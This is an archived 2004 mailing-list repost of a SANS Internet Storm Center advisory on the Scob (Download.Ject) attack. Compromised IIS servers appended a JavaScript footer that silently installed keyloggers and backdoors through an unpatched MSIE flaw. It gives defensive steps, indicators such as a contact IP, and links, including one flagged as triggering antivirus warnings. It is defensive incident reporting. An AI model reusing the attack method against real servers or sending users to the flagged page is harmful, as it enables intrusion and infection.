CRIME New IIS Worm

From: Brian Varine (witchdr@private)
Date: Fri Jun 25 2004 - 07:55:41 PDT


Via Incidents.org
Updated June 25th 2004 14:11 UTC (Handler: Deb Hale) 
Compromised Web Sites Infect Web Surfers
(for more details, also see yesterday's diary:
http://isc.sans.org/diary.php?date=2004-06-24 ) 
Updates will be posted here.


A large number of web sites, some of them quite popular, were compromised
earlier this week to distribute malicious code. The attacker uploaded a small
file with javascript to infected web sites, and altered the web server
configuration to append the script to all files served by the web server. The
Storm Center and others are still investigating the method used to compromise
the servers. Several server administrators reported that they were fully
patched. 

If a user visited an infected site, the javascript delivered by the site would
instruct the user's browser to download an executable from a Russian web site
and install it. Different executables were observed. These trojan horse
programs include keystroke loggers, proxy servers and other back doors
providing full access to the infected system. 

The javascript uses a so far unpatched vulnerability in MSIE to download and
execute the code. No warning will be displayed. The user does not have to
click on any links. Just visiting an infected site will trigger the exploit. 

If your SERVER was compromised, you will observe: 

* All files sent by the web server will include the javascript. As the
javascript is delivered by the web server as a global footer, images and other
documents (robots.txt, word files) will include the javascript as well.
* The files on your server will not be altered. The javascript is included as
a global footer and appended by the server as they are delivered to the
browser. 
* You will find that the global footer is set to a new file.
* For snort signatures, see http://www.bleedingsnort.com 


We do not know at this point how the affected servers have been compromised.
The SSL-PCT exploit is at the top of our list of suspects. If you find a
compromised server, we strongly recommend a complete rebuild. You may be able
to get your web site back into business by changing the footer setting and
removing the javascript file. But this is a likely a very sophisticated attack
and you should expect other stealthy Backdoors. 

If you visited an affected page, and your BROWSER is compromised: 

* You may see a warning about a javascript error. But it depends on how the
attack code interfers with other javascript on the respective page, and many
users disable these javascript warnings. 
* Disconnect the system from the network as soon as possible.
* run a thorough virus check with up to date virus definitions. Many AV
vendors released new definitions as recently as last night.
* If you are able to monitor traffic to the infected host, you may see
attempts to contact 217.107.218.147 on port 80.
* AV software will detect the javascript as 'JS.Scob.Trojan'. 

FAQ's about this attack: 

- Is this the first time web servers have been compromised to attack browsers?


No. Nimda attempted the same trick, using an older MSIE exploit. Other
attempts have been observed in the past. This attack is special because it
affects a large number of servers and is not easily detectable. 

- Will affected websites be "defaced" or otherwise altered? 

No. In most cases, the web sites will look just like usual to the casual
browser. The infected javascript may interfere with other javascript on the
respective page. 

- Will the javascript attached to images be executed? No. The javascript
attached to images is harmless. It's the JavaScript attached to the .htm or
.html files that gets executed, forcing the browser to connect to the Russian
site. 

- How can I protect my web server from becoming infected and used as a host
for the script? 

Apply all necessary patches. If you find an unpatched web server, assume it
has been compromised even if you do not see an obvious sign of an attack.
Given the current threat environment, an unpatched web server is likely to be
attacked successfully within a few hours. 

- How can I protect my users from these web sites. Do you publish a list?
Should they stop browsing? 

We do not provide a list of infected sites. Instead we try to work with site
administrators to have them shut down as soon as possible. Right now, we don't
know of any sites that are still hosting the script. Given that this attack is
likely going to be repeated using different javascript code, we recommend that
you (*) install and maintain anti virus software (*) if possible turn off
javascript, or use a browser other then MSIE until the current vulnerabilities
in MSIE are patched. 

Relevant Links 

Analysis of the underlying MSIE vulnerability:
! This link will trigger some warnings from AV software !
http://62.131.86.111/analysis.htm (thanks to Olivier de Jong)


Symantec writeup for js.scob.trojan:
http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html 


MSIE Exploit information from Security Focus:
http://www.securityfocus.com/bid/10472 
http://www.securityfocus.com/bid/10473 
CHMM Vulnerability (not used here, but used by similar exploits )
:http://www.securityfocus.com/bid/9658/info/ 


F-Secure Information:
http://www.f-secure.com/weblog/ 
http://www.f-secure.com/v-descs/scob.shtml 
http://www.f-secure.com/v-descs/padodorw.shtml 


Microsoft Alert:
http://www.microsoft.com/security/incident/download_ject.mspx 


UseNet Discussion about IIS exploits:
http://www.derkeiler.com/Newsgroups/microsoft.public.inetserver.iis.security/2004-06/0588.html



Snort Rule:
http://snort.infotex.com/cgi-bin/viewcvs.cgi/Stable/VIRUS_Unknown_IIS_Worm 



This archive was generated by hypermail 2b30 : Fri Jun 25 2004 - 08:35:21 PDT